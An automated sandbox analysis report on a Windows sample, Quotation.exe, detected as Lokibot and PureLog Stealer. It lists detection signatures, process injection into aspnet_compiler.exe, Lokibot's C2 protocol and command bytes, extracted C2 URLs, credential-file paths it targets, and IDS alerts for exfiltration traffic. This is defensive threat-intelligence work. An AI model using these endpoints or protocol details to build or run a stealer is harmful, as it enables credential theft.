Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:	Quotation.exe
Analysis ID:	1566634
MD5:	a6d27c830af952414ff70b257cf26948
SHA1:	691fc8feed36fc7c9b7933e1c3807e5314d40d5e
SHA256:	c7bfb04b5e314178b5d3602cbbb9e6abe716936aef501b645d7c1aa2cbeaaaf3
Tags:	exeuser-adrian__luca
Infos:

Detection

Lokibot, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Lokibot

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Quotation.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: A6D27C830AF952414FF70B257CF26948)

aspnet_compiler.exe (PID: 1648 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dvlref.online/BISH/PWS/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Quotation.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
sslproxydump.pcap	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x19b25:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
sslproxydump.pcap	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5582:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
sslproxydump.pcap	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x152d4:$des3: 68 03 66 00 00 0x19b25:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19bf1:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000002.00000002.1343184318.000000000270A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x7a6b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000000.1280573223.0000000000362000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17960:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x4d2b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1356f:$des3: 68 03 66 00 00 0x17960:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17a2c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17d54:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5107:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1394b:$des3: 68 03 66 00 00 0x17d54:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17e20:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x7940:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x354f:$des3: 68 03 66 00 00 0x7940:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x7a0c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: Quotation.exe PID: 4828	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Quotation.exe PID: 4828	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Quotation.exe PID: 4828	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1c5c9:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x40d2b:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x43be3:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: aspnet_compiler.exe PID: 1648	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1648	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1648	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 1648	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x8f60:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.Quotation.exe.270d2b0.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Quotation.exe.270d2b0.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Quotation.exe.3699570.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.Quotation.exe.3699570.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.Quotation.exe.3699570.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Quotation.exe.3699570.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
2.2.Quotation.exe.3699570.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.aspnet_compiler.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.2.aspnet_compiler.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.aspnet_compiler.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
2.0.Quotation.exe.360000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.Quotation.exe.3699570.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
2.2.Quotation.exe.3699570.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
2.2.Quotation.exe.3699570.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.Quotation.exe.3699570.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
2.2.Quotation.exe.3699570.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
2.2.Quotation.exe.3699570.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
2.2.Quotation.exe.3699570.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
2.2.Quotation.exe.3699570.3.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.aspnet_compiler.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.aspnet_compiler.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.aspnet_compiler.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation.exe", ParentImage: C:\Users\user\Desktop\Quotation.exe, ParentProcessId: 4828, ParentProcessName: Quotation.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 1648, ProcessName: aspnet_compiler.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:29.254051+0100	2024312	1	A Network Trojan was detected	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:31.063978+0100	2024312	1	A Network Trojan was detected	192.168.2.7	49709	104.21.57.140	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T14:46:27.824606+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49703	104.21.57.140	80	TCP
2024-12-02T14:46:29.772994+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49709	104.21.57.140	80	TCP
2024-12-02T14:46:31.365226+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49710	104.21.57.140	80	TCP
2024-12-02T14:46:33.110694+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49716	104.21.57.140	80	TCP
2024-12-02T14:46:34.837853+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49722	104.21.57.140	80	TCP
2024-12-02T14:46:36.896166+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49723	104.21.57.140	80	TCP
2024-12-02T14:46:38.615373+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49730	104.21.57.140	80	TCP
2024-12-02T14:46:40.267794+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49737	104.21.57.140	80	TCP
2024-12-02T14:46:41.937967+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49745	104.21.57.140	80	TCP
2024-12-02T14:46:43.563586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49746	104.21.57.140	80	TCP
2024-12-02T14:46:45.314614+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49752	104.21.57.140	80	TCP
2024-12-02T14:46:47.001555+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49758	104.21.57.140	80	TCP
2024-12-02T14:46:48.710341+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49764	104.21.57.140	80	TCP
2024-12-02T14:46:50.347634+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49765	104.21.57.140	80	TCP
2024-12-02T14:46:52.163009+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49771	104.21.57.140	80	TCP
2024-12-02T14:46:53.787715+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49777	104.21.57.140	80	TCP
2024-12-02T14:46:55.491152+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49781	104.21.57.140	80	TCP
2024-12-02T14:46:57.218517+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49785	104.21.57.140	80	TCP
2024-12-02T14:46:58.861315+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49790	104.21.57.140	80	TCP
2024-12-02T14:47:00.531526+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49796	104.21.57.140	80	TCP
2024-12-02T14:47:02.240374+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49800	104.21.57.140	80	TCP
2024-12-02T14:47:03.989197+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49803	104.21.57.140	80	TCP
2024-12-02T14:47:05.698802+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49809	104.21.57.140	80	TCP
2024-12-02T14:47:07.284782+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49815	104.21.57.140	80	TCP
2024-12-02T14:47:08.953661+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49818	104.21.57.140	80	TCP
2024-12-02T14:47:10.595338+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49822	104.21.57.140	80	TCP
2024-12-02T14:47:12.239800+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49828	104.21.57.140	80	TCP
2024-12-02T14:47:13.896676+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49834	104.21.57.140	80	TCP
2024-12-02T14:47:15.472435+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49836	104.21.57.140	80	TCP
2024-12-02T14:47:17.172628+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49841	104.21.57.140	80	TCP
2024-12-02T14:47:18.763775+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49847	104.21.57.140	80	TCP
2024-12-02T14:47:20.392040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49850	104.21.57.140	80	TCP
2024-12-02T14:47:22.018417+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49854	104.21.57.140	80	TCP
2024-12-02T14:47:23.899318+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49860	104.21.57.140	80	TCP
2024-12-02T14:47:25.519040+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49867	104.21.57.140	80	TCP
2024-12-02T14:47:27.125460+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49871	104.21.57.140	80	TCP
2024-12-02T14:47:28.752703+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49875	104.21.57.140	80	TCP
2024-12-02T14:47:30.441791+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49882	104.21.57.140	80	TCP
2024-12-02T14:47:32.141392+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49887	104.21.57.140	80	TCP
2024-12-02T14:47:33.859801+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49891	104.21.57.140	80	TCP
2024-12-02T14:47:35.503758+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49895	104.21.57.140	80	TCP
2024-12-02T14:47:37.095474+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49900	104.21.57.140	80	TCP
2024-12-02T14:47:38.724665+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49906	104.21.57.140	80	TCP
2024-12-02T14:47:40.543502+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.7	49909	104.21.57.140	80	TCP
